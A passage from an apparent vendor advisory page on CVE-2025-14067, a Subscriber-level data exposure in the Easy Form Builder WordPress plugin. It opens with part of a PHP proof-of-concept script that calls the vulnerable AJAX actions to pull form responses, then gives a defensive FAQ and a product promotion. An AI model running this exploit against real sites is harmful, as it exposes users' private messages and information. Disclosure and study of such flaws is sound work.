$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'get_responses_efb', // Vulnerable AJAX action
    'nonce' => $nonce, // May be bypassed due to logical error
    'form_id' => '1', // Target form ID
    'page' => '1', // Pagination
    'per_page' => '50' // Number of responses to retrieve
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));

$ajax_response = curl_exec($ch);

// Display results
echo "Target: " . $target_url . "n";
echo "Vulnerable Endpoint: " . $ajax_url . "n";
echo "AJAX Action: " . $exploit_data['action'] . "n";
echo "nResponse:n";
echo $ajax_response . "n";

// Step 4: Additional exploitation - retrieve specific response
$exploit_data['action'] = 'get_response_efb';
$exploit_data['response_id'] = '1'; // Target specific response ID

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$specific_response = curl_exec($ch);

echo "nSpecific Response Data:n";
echo $specific_response . "n";

curl_close($ch);

// Clean up
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>

Frequently Asked Questions

What is CVE-2025-14067?
Overview of the vulnerability
CVE-2025-14067 is a medium severity vulnerability in the Easy Form Builder plugin for WordPress, affecting versions up to and including 3.9.3. It allows authenticated users with Subscriber-level access and above to access sensitive form response data due to a missing authorization check.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a logic error in the authorization checks within multiple AJAX endpoints of the plugin. The plugin incorrectly uses a logical AND operator instead of OR, allowing authenticated users to bypass necessary checks and access sensitive data.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the Easy Form Builder plugin version 3.9.3 or earlier is affected. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability to access sensitive data.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Easy Form Builder plugin installed. If it is version 3.9.3 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Steps to mitigate the issue
To fix the vulnerability, update the Easy Form Builder plugin to version 3.9.4 or later, which contains the necessary security patch. Regularly check for updates to ensure your plugins are secure.
What does the CVSS score of 5.3 indicate?
Understanding the risk level
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access to sensitive information.
What kind of data can be exposed due to this vulnerability?
Types of sensitive information at risk
The vulnerability allows attackers to access sensitive form response data, including user messages, admin replies, and user information. This data exposure can lead to privacy breaches and further attacks.
What is the proof of concept for CVE-2025-14067?
Demonstration of the vulnerability
The proof of concept demonstrates how an authenticated user can exploit the vulnerability by sending AJAX requests to the vulnerable endpoints. It shows how to bypass the authorization checks to retrieve sensitive data.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Easy Form Builder plugin until it can be updated. Additionally, review user permissions and restrict access to trusted users only.
Are there any other security practices to follow?
Enhancing overall WordPress security
In addition to updating plugins, regularly audit your WordPress site for vulnerabilities, use strong passwords, implement two-factor authentication, and maintain regular backups to enhance security.
What are AJAX endpoints in WordPress?
Understanding AJAX functionality
AJAX endpoints in WordPress allow for asynchronous data retrieval without reloading the page. They are commonly used in plugins for actions like form submissions and data fetching, but must be secured to prevent unauthorized access.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
Subscribe to security mailing lists, follow WordPress security blogs, and monitor the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations